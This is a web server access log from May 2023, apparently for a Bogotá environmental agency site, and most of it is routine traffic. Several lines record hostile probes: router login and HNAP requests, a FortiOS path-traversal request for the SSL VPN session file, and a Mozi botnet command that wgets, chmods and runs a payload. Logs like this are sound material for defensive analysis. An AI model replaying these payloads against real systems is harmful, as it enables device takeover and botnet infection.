172.22.2.4 - - [14/May/2023:18:22:36 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3017&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1596
216.245.221.92 - - [14/May/2023:18:22:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:18:23:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
40.77.167.97 - - [14/May/2023:18:24:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/2142.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/May/2023:18:24:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:18:25:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
216.245.221.92 - - [14/May/2023:18:27:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:18:28:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
201.245.192.253 - - [14/May/2023:18:29:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40361
201.245.192.253 - - [14/May/2023:18:29:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43974
186.30.41.88 - - [14/May/2023:18:31:15 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 457959
172.22.2.4 - - [14/May/2023:18:30:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:18:32:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:18:31:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
201.245.192.253 - - [14/May/2023:18:33:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:18:32:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55221
40.77.167.146 - - [14/May/2023:18:36:33 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
172.22.2.4 - - [14/May/2023:18:36:45 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
179.43.163.132 - - [14/May/2023:18:36:54 -0500] "GET / HTTP/1.1" 200 319
179.43.163.132 - - [14/May/2023:18:36:55 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:18:37:10 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2006%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 4657752
66.249.77.25 - - [14/May/2023:18:37:17 -0500] "-" 408 -
216.245.221.92 - - [14/May/2023:18:37:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:18:36:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [14/May/2023:18:38:39 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [14/May/2023:18:38:40 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [14/May/2023:18:38:40 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [14/May/2023:18:38:40 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [14/May/2023:18:38:40 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [14/May/2023:18:38:40 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [14/May/2023:18:38:40 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [14/May/2023:18:38:40 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
190.0.241.186 - - [14/May/2023:18:38:41 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
190.0.241.186 - - [14/May/2023:18:38:41 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
190.0.241.186 - - [14/May/2023:18:38:41 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
190.0.241.186 - - [14/May/2023:18:38:41 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
201.245.192.253 - - [14/May/2023:18:38:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:18:37:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58307
186.30.41.88 - - [14/May/2023:18:38:49 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 328612
190.0.241.186 - - [14/May/2023:18:38:51 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
190.0.241.186 - - [14/May/2023:18:38:51 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
190.0.241.186 - - [14/May/2023:18:38:51 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 301581
201.245.192.253 - - [14/May/2023:18:39:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40361
201.245.192.253 - - [14/May/2023:18:39:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43974
181.62.149.79 - - [14/May/2023:18:39:32 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
181.62.149.79 - - [14/May/2023:18:39:32 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
181.62.149.79 - - [14/May/2023:18:39:32 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
181.62.149.79 - - [14/May/2023:18:39:32 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
181.62.149.79 - - [14/May/2023:18:39:32 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
87.236.176.126 - - [14/May/2023:18:40:02 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
216.245.221.92 - - [14/May/2023:18:42:49 -0500] "HEAD / HTTP/1.1" 200 -
179.33.116.251 - - [14/May/2023:18:43:02 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
201.245.192.253 - - [14/May/2023:18:43:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:18:42:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:18:42:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
181.157.214.222 - - [14/May/2023:18:44:59 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
172.22.2.4 - - [14/May/2023:18:45:08 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3016&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1368
199.16.157.183 - - [14/May/2023:18:45:49 -0500] "GET /images/Archivo%20pacto%20aire%2023%20enero.jpeg HTTP/1.1" 200 28889
199.16.157.181 - - [14/May/2023:18:45:49 -0500] "GET /secretaria-de-ambiente-otorgo-reconocimiento-a-80-empresas-vinculadas-al-pacto-unidos-por-un-nuevo-aire.html HTTP/1.1" 200 964
66.249.77.21 - - [14/May/2023:18:46:17 -0500] "-" 408 -
186.30.41.88 - - [14/May/2023:18:46:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 457959
120.86.239.237 - - [14/May/2023:18:46:40 -0500] "POST /HNAP1/ HTTP/1.0" 400 945
52.167.144.32 - - [14/May/2023:18:47:44 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [14/May/2023:18:47:49 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.211 - - [14/May/2023:18:47:56 -0500] "GET /BLA/resoluciones/AUTOS%202013/2693.pdf HTTP/1.1" 200 1169360
201.245.192.253 - - [14/May/2023:18:48:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
40.77.167.97 - - [14/May/2023:18:48:40 -0500] "GET /BLA/resoluciones/AUTOS%202019/0276.pdf HTTP/1.1" 200 256944
172.22.2.4 - - [14/May/2023:18:47:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:18:48:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [14/May/2023:18:52:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:18:53:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
40.77.167.146 - - [14/May/2023:18:54:23 -0500] "GET /calculadora/? HTTP/1.1" 200 5879
172.22.2.4 - - [14/May/2023:18:55:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/May/2023:18:53:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.30.41.88 - - [14/May/2023:18:55:57 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 457959
172.22.2.4 - - [14/May/2023:18:54:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [14/May/2023:18:57:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:18:58:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
35.208.187.63 - - [14/May/2023:19:00:13 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202017/0520.pdf HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:18:59:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:19:00:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58663
170.78.42.102 - - [14/May/2023:19:02:14 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
170.78.42.102 - - [14/May/2023:19:02:14 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
170.78.42.102 - - [14/May/2023:19:02:14 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
216.245.221.92 - - [14/May/2023:19:02:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:19:03:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
37.114.40.163 - - [14/May/2023:19:04:10 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
179.43.177.243 - - [14/May/2023:19:04:28 -0500] "GET / HTTP/1.1" 200 319
40.77.167.146 - - [14/May/2023:19:04:46 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
172.22.2.4 - - [14/May/2023:19:05:05 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/May/2023:19:05:05 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/May/2023:19:05:05 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [14/May/2023:19:05:05 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [14/May/2023:19:05:05 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [14/May/2023:19:05:05 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/May/2023:19:05:05 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/May/2023:19:05:05 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/May/2023:19:05:06 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/May/2023:19:05:06 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [14/May/2023:19:05:06 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [14/May/2023:19:05:06 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [14/May/2023:19:05:06 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [14/May/2023:19:05:06 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [14/May/2023:19:05:06 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [14/May/2023:19:05:06 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [14/May/2023:19:05:13 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [14/May/2023:19:05:17 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/May/2023:19:05:17 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/May/2023:19:05:17 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/May/2023:19:05:17 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/May/2023:19:05:17 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/May/2023:19:05:17 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/May/2023:19:05:17 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/May/2023:19:05:17 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
173.252.107.9 - - [14/May/2023:19:06:14 -0500] "GET /autoridades-frenan-disposicion-de-residuos-de-construccion-cerca-al-humedal-salitre.html HTTP/1.1" 206 935
172.22.2.4 - - [14/May/2023:19:04:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56287
172.22.2.4 - - [14/May/2023:19:06:38 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1308
172.22.2.4 - - [14/May/2023:19:05:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:19:07:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:19:06:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52730
191.92.168.91 - - [14/May/2023:19:08:08 -0500] "GET /red-de-calidad-hidrica-de-bogota-una-herramienta-para-monitorear-la-calidad-del-agua.html HTTP/1.1" 200 817
201.245.192.253 - - [14/May/2023:19:08:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
40.77.190.102 - - [14/May/2023:19:09:41 -0500] "GET /calculadora/fonts/font-awesome-4.7.0/css/font-awesome.min.css HTTP/1.1" 200 31000
40.77.189.176 - - [14/May/2023:19:09:41 -0500] "GET /calculadora/fonts/Linearicons-Free-v1.0.0/icon-font.min.css HTTP/1.1" 200 7354
40.77.188.10 - - [14/May/2023:19:09:41 -0500] "GET /calculadora/vendor/bootstrap/css/bootstrap.min.css HTTP/1.1" 200 124962
40.77.188.186 - - [14/May/2023:19:09:41 -0500] "GET /calculadora/vendor/animate/animate.css HTTP/1.1" 200 23848
40.77.189.108 - - [14/May/2023:19:09:42 -0500] "GET /calculadora/vendor/css-hamburgers/hamburgers.min.css HTTP/1.1" 200 19686
40.77.189.1 - - [14/May/2023:19:09:42 -0500] "GET /calculadora/vendor/select2/select2.min.css HTTP/1.1" 200 15196
40.77.188.224 - - [14/May/2023:19:09:42 -0500] "GET /calculadora/vendor/animsition/css/animsition.min.css HTTP/1.1" 200 27478
40.77.190.248 - - [14/May/2023:19:09:42 -0500] "GET /calculadora/vendor/daterangepicker/daterangepicker.css HTTP/1.1" 200 8163
40.77.188.90 - - [14/May/2023:19:09:42 -0500] "GET /calculadora/css/util.css HTTP/1.1" 200 86814
40.77.190.191 - - [14/May/2023:19:09:42 -0500] "GET /calculadora/css/main.css HTTP/1.1" 200 9984
40.77.189.98 - - [14/May/2023:19:09:43 -0500] "GET /calculadora/ajax_calculadora.js HTTP/1.1" 200 1470
40.77.190.102 - - [14/May/2023:19:09:43 -0500] "GET /calculadora/js/main.js HTTP/1.1" 200 1424
40.77.189.98 - - [14/May/2023:19:09:43 -0500] "GET /calculadora/fonts/montserrat/Montserrat-Bold.ttf HTTP/1.1" 200 261588
40.77.188.68 - - [14/May/2023:19:09:43 -0500] "GET /calculadora/fonts/poppins/Poppins-Regular.ttf HTTP/1.1" 200 145312
172.22.2.4 - - [14/May/2023:19:10:27 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 266364
128.1.248.26 - - [14/May/2023:19:12:29 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
216.245.221.92 - - [14/May/2023:19:12:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:19:11:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:19:13:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
40.77.167.97 - - [14/May/2023:19:13:33 -0500] "GET /galeria/galeria/fotos/Capellania4P.jpg HTTP/1.1" 200 37377
54.193.76.161 - - [14/May/2023:19:13:40 -0500] "GET /galeria/galeria/fotos/Humedal-Tibanica3P.jpg HTTP/1.1" 200 28016
172.22.2.4 - - [14/May/2023:19:12:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
69.171.251.22 - - [14/May/2023:19:14:49 -0500] "GET /images/rehabilitacion-de-un-tayra-en-bogota.jpg HTTP/1.1" 200 41000
66.249.77.25 - - [14/May/2023:19:15:14 -0500] "-" 408 -
216.245.221.92 - - [14/May/2023:19:17:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:19:18:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:19:17:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:19:19:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40351
201.245.192.253 - - [14/May/2023:19:19:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44093
172.22.2.4 - - [14/May/2023:19:17:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
40.77.167.97 - - [14/May/2023:19:19:54 -0500] "GET /BLA/resoluciones/AUTOS%202022/5998.pdf HTTP/1.1" 200 388097
172.22.2.4 - - [14/May/2023:19:22:10 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2011%20del%2024%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 169541
216.245.221.92 - - [14/May/2023:19:22:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:19:23:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:19:22:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:19:23:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
172.22.2.4 - - [14/May/2023:19:23:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55221
216.245.221.92 - - [14/May/2023:19:27:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:19:28:14 -0500] "GET /BLA/boletinlegal/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 1018
201.245.192.253 - - [14/May/2023:19:28:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
201.245.192.253 - - [14/May/2023:19:29:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40351
201.245.192.253 - - [14/May/2023:19:29:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44093
172.22.2.4 - - [14/May/2023:19:28:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.146 - - [14/May/2023:19:30:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4515.pdf HTTP/1.1" 200 354332
172.22.2.4 - - [14/May/2023:19:29:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
173.252.95.17 - - [14/May/2023:19:31:21 -0500] "GET /unidos-por-un-nuevo-aire-un-ano-de-pacto-del-compromiso-por-bogota.html HTTP/1.1" 206 764
173.252.79.2 - - [14/May/2023:19:31:21 -0500] "GET /images/prueba3.jpeg HTTP/1.1" 200 88955
173.252.95.12 - - [14/May/2023:19:31:22 -0500] "GET /images/prueba3.jpeg HTTP/1.1" 200 88955
216.245.221.92 - - [14/May/2023:19:32:49 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.146 - - [14/May/2023:19:33:18 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [14/May/2023:19:33:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:19:34:14 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:19:33:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [14/May/2023:19:34:46 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [14/May/2023:19:33:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
172.22.2.4 - - [14/May/2023:19:34:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45144
172.22.2.4 - - [14/May/2023:19:34:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:19:34:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 42868
172.22.2.4 - - [14/May/2023:19:35:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45974
172.22.2.4 - - [14/May/2023:19:36:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
216.245.221.92 - - [14/May/2023:19:37:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:19:38:23 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [14/May/2023:19:38:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
201.245.192.253 - - [14/May/2023:19:39:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40351
201.245.192.253 - - [14/May/2023:19:39:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44093
172.22.2.4 - - [14/May/2023:19:38:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61759
172.22.2.4 - - [14/May/2023:19:39:54 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/May/2023:19:41:22 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
172.22.2.4 - - [14/May/2023:19:40:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:19:42:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:19:41:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
201.245.192.253 - - [14/May/2023:19:43:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:19:44:37 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 200 25011
213.186.1.154 - - [14/May/2023:19:44:37 -0500] "GET /images/BFW-carlina-urrutia.jpg HTTP/1.1" 200 38276
213.186.1.154 - - [14/May/2023:19:44:38 -0500] "GET /images/BFW-carlina-urrutia.jpg HTTP/1.1" 200 38276
186.148.240.222 - - [14/May/2023:19:44:46 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 946
172.22.2.4 - - [14/May/2023:19:44:46 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [14/May/2023:19:44:47 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:19:44:47 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
66.249.77.21 - - [14/May/2023:19:44:47 -0500] "-" 408 -
172.22.2.4 - - [14/May/2023:19:44:47 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:19:44:47 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:19:44:47 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:19:44:47 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:19:44:47 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
